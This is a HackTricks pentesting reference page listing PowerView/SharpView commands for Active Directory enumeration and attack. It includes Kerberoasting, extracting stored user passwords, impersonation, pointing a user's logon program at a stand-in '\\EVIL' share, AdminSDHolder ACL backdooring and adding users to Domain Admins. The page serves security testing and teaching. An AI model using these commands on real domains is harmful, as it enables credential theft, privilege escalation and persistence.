powerview.md (17620B)
1 --- 2 title: "PowerView/SharpView" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/basic-powershell-for-pentesters/powerview.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/basic-powershell-for-pentesters/powerview.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # PowerView/SharpView 14 15 The final PowerView version published in the now-archived PowerSploit project is available in its development branch: [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1).<sup>[[1]](#references)</sup> 16 17 [**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of PowerView. The examples below are a practical command reference; confirm parameters against the version you are running because PowerView aliases and behavior vary between releases.<sup>[[1]](#references)[[2]](#references)</sup> 18 19 ## Quick enumeration 20 21 ```bash 22 Get-NetDomain #Basic domain info 23 #User info 24 Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info 25 Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set 26 Get-NetUser -PreauthNotRequired #ASREPRoastable users 27 Get-NetUser -SPN #Kerberoastable users 28 #Groups info 29 Get-NetGroup | select samaccountname, admincount, description 30 Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders 31 #Computers 32 Get-NetComputer | select samaccountname, operatingsystem 33 Get-NetComputer -Unconstrained | select samaccountname #DCs always appear but aren't useful for privilege escalation 34 Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation 35 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups 36 #Shares 37 Find-DomainShare -CheckShareAccess #Search readable shares 38 #Domain trusts 39 Get-NetDomainTrust #Get all domain trusts (parent, children and external) 40 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found 41 #LHF 42 #Check if any user passwords are set 43 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl 44 #Asks the DC for all computers and checks each one for local admin access (very noisy). RPC and SMB ports must be open. 45 Find-LocalAdminAccess 46 #Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts. 47 Invoke-UserHunter -CheckAccess 48 #Find interesting ACLs 49 Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl 50 ``` 51 52 ## Domain info 53 54 ```bash 55 # Domain Info 56 Get-Domain #Get info about the current domain 57 Get-NetDomain #Get info about the current domain 58 Get-NetDomain -Domain mydomain.local 59 Get-DomainSID #Get domain SID 60 61 # Policy 62 Get-DomainPolicy #Get info about the policy 63 (Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge) 64 (Get-DomainPolicy)."SystemAccess" #Password policy 65 Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous 66 (Get-DomainPolicy).PrivilegeRights #Check your privileges 67 Get-DomainPolicyData # Same as Get-DomainPolicy 68 69 # Domain Controller 70 Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller 71 Get-NetDomainController -Domain mydomain.local #Get domain controllers for the specified domain 72 73 # Get Forest info 74 Get-ForestDomain 75 ``` 76 77 ## Users, Groups, Computers & OUs 78 79 ```bash 80 # Users 81 ## Get usernames and their groups 82 Get-DomainUser -Properties name, MemberOf | fl 83 ## Get-DomainUser and Get-NetUser are kind of the same 84 Get-NetUser #Get users with several (not all) properties 85 Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernames 86 Get-NetUser -UserName student107 #Get info about a user 87 Get-NetUser -properties name, description #Get all descriptions 88 Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount 89 Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter 90 # Get users with reversible encryption (PWD in clear text with dcsync) 91 Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol 92 93 # Users Filters 94 Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users 95 Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users 96 Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card 97 Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users 98 Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set 99 Get-NetUser -PreauthNotRequired #ASREPRoastable users 100 Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users 101 Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable 102 Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Constrained Resource Delegation 103 Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation 104 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 105 Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 106 ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 107 } 108 # Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy 109 ## Users with this flag might have empty passwords (if allowed) or shorter passwords 110 Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol 111 112 #Groups 113 Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName 114 ## Get-DomainGroup is similar to Get-NetGroup 115 Get-NetGroup #Get groups 116 Get-NetGroup -Domain mydomain.local #Get groups from a specific domain 117 Get-NetGroup 'Domain Admins' #Get all data of a group 118 Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl #Search administrative groups 119 Get-NetGroup -UserName "myusername" #Get groups of a user 120 Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also 121 Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest 122 Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts) 123 Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer 124 Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder users 125 Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #Get ObjectACLs by sid 126 Get-NetGPOGroup #Get restricted groups 127 128 # Computers 129 Get-DomainComputer -Properties DnsHostName #Get the DNS hostnames of domain computers 130 ## Get-DomainComputer is kind of the same as Get-NetComputer 131 Get-NetComputer #Get all computer objects 132 Get-NetComputer -Ping #Send a ping to check if the computers are working 133 Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privilege escalation 134 Get-NetComputer -TrustedToAuth #Find computers with constrained delegation 135 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups 136 137 #OU 138 Get-DomainOU -Properties Name | sort -Property Name #Get names of OUs 139 Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case) 140 ## Get-DomainOU is kind of the same as Get-NetOU 141 Get-NetOU #Get Organization Units 142 Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case) 143 ``` 144 145 ## Logon and Sessions 146 147 ```bash 148 Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target) 149 Get-NetSession -ComputerName <servername> #Get active sessions on the host 150 Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS)) 151 Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host) 152 Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host) 153 ``` 154 155 ## Group Policy Object - GPOs 156 157 If an attacker has **high privileges over a GPO**, they may be able to **escalate privileges** by granting permissions to a user, adding a local administrator to a host, or creating an immediate scheduled task.\ 158 For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/index.html#gpo-delegation). 159 160 ```bash 161 #GPO 162 Get-DomainGPO | select displayName #Check the names for info 163 Get-NetGPO #Get all policies with details 164 Get-NetGPO | select displayname #Get the names of the policies 165 Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer 166 gpresult /V #Get current policy 167 168 # Get who can create new GPOs 169 Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl 170 171 # Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights 172 Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl 173 174 # Get permissions a user/group has over any GPO 175 $sid=Convert-NameToSid "Domain Users" 176 Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} 177 178 # Convert GPO GUID to name 179 Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532 180 181 # Transform SID to name 182 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126 183 184 # Get GPO of an OU 185 Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}' 186 187 # Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences. 188 Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType 189 190 # Enumerates the machines where a specific domain user/group is a member of a specific local group. 191 Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName 192 ``` 193 194 Learn how to **exploit permissions over GPOs and ACLs** in: 195 196 197 [Acl Persistence Abuse](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview) 198 199 ## ACL 200 201 ```bash 202 #Get ACLs of an object (permissions of other objects over the indicated one) 203 Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs 204 205 #Other way to get ACLs of an object 206 $sid = Convert-NameToSid <username/group> 207 Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 208 209 #Get permissions of a file 210 Get-PathAcl -Path "\\dc.mydomain.local\sysvol" 211 212 #Find interesting ACEs (modification rights held by unexpected objects with RID > 1000) 213 Find-InterestingDomainAcl -ResolveGUIDs 214 215 #Check whether any interesting permission is related to a username/group 216 Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} 217 218 #Get special rights over All administrators in domain 219 Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights 220 ``` 221 222 ## Shared files and folders 223 224 ```bash 225 Get-NetFileServer #Search file servers, where many users may have active sessions 226 Find-DomainShare -CheckShareAccess #Search readable shares 227 Find-InterestingDomainShareFile #Find interesting files, can use filters 228 ``` 229 230 ## Domain Trust 231 232 ```bash 233 Get-NetDomainTrust #Get all domain trusts (parent, children and external) 234 Get-DomainTrust #Same 235 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found 236 Get-DomainTrustMapping #Enumerate also all the trusts 237 238 Get-ForestDomain # Get basic forest info 239 Get-ForestGlobalCatalog #Get info of current forest (no external) 240 Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible) 241 Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)" 242 243 Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust) 244 245 Get-DomainForeignUser #Get users with privileges in other domains inside the forest 246 Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest 247 ``` 248 249 ## Low-hanging fruit 250 251 ```bash 252 #Check if any user passwords are set 253 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl 254 255 #Asks the DC for all computers and checks each one for local admin access (very noisy). RPC and SMB ports must be open. 256 Find-LocalAdminAccess 257 258 #(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed. 259 .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt 260 261 #Enumerate machines where a particular user/group identity has local admin rights 262 Get-DomainGPOUserLocalGroupMapping -Identity <User/Group> 263 264 # Enumerates the members of specified local group (default administrators) 265 # for all the targeted machines on the current (or specified) domain. 266 Invoke-EnumerateLocalAdmin 267 Find-DomainLocalGroupMember 268 269 #Search unconstrained delegation computers and show users 270 Find-DomainUserLocation -ComputerUnconstrained -ShowAll 271 272 #Admin users that allow delegation, logged into servers that allow unconstrained delegation 273 Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation 274 275 #Get members from Domain Admins (default) and a list of computers 276 # and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. 277 # If -CheckAccess is used, it also checks for local administrator access on the hosts. 278 ## By default users inside Domain Admins are searched 279 Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName 280 Invoke-UserHunter [-CheckAccess] 281 282 #Search "RDPUsers" users 283 Invoke-UserHunter -GroupName "RDPUsers" 284 285 #It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers) 286 Invoke-UserHunter -Stealth 287 ``` 288 289 ## Deleted objects 290 291 ```bash 292 #This is not a PowerView command; it comes from Microsoft's Active Directory PowerShell module 293 #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects 294 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * 295 ``` 296 297 ## Miscellaneous 298 299 ### SID to Name 300 301 ```bash 302 "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName 303 ``` 304 305 ### Kerberoast 306 307 ```bash 308 Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users 309 ``` 310 311 ### Use different credentials (argument) 312 313 ```bash 314 # Use alternate credentials with any supported function 315 $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force 316 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 317 Get-DomainUser -Credential $Cred 318 ``` 319 320 ### Impersonate a user 321 322 ```bash 323 # if running in -sta mode, impersonate another credential a la "runas /netonly" 324 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 325 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 326 Invoke-UserImpersonation -Credential $Cred 327 # ... action 328 Invoke-RevertToSelf 329 ``` 330 331 ### Set values 332 333 ```bash 334 # set the specified property for the given user identity 335 Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose 336 # Set the owner of 'dfm' in the current domain to 'harmj0y' 337 Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y 338 # Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 339 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All 340 # Add user to 'Domain Admins' 341 Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local 342 ``` 343 344 ## References 345 346 - [1] [PowerSploit - PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) 347 - [2] [SharpView - .NET port of PowerView](https://github.com/tevora-threat/SharpView)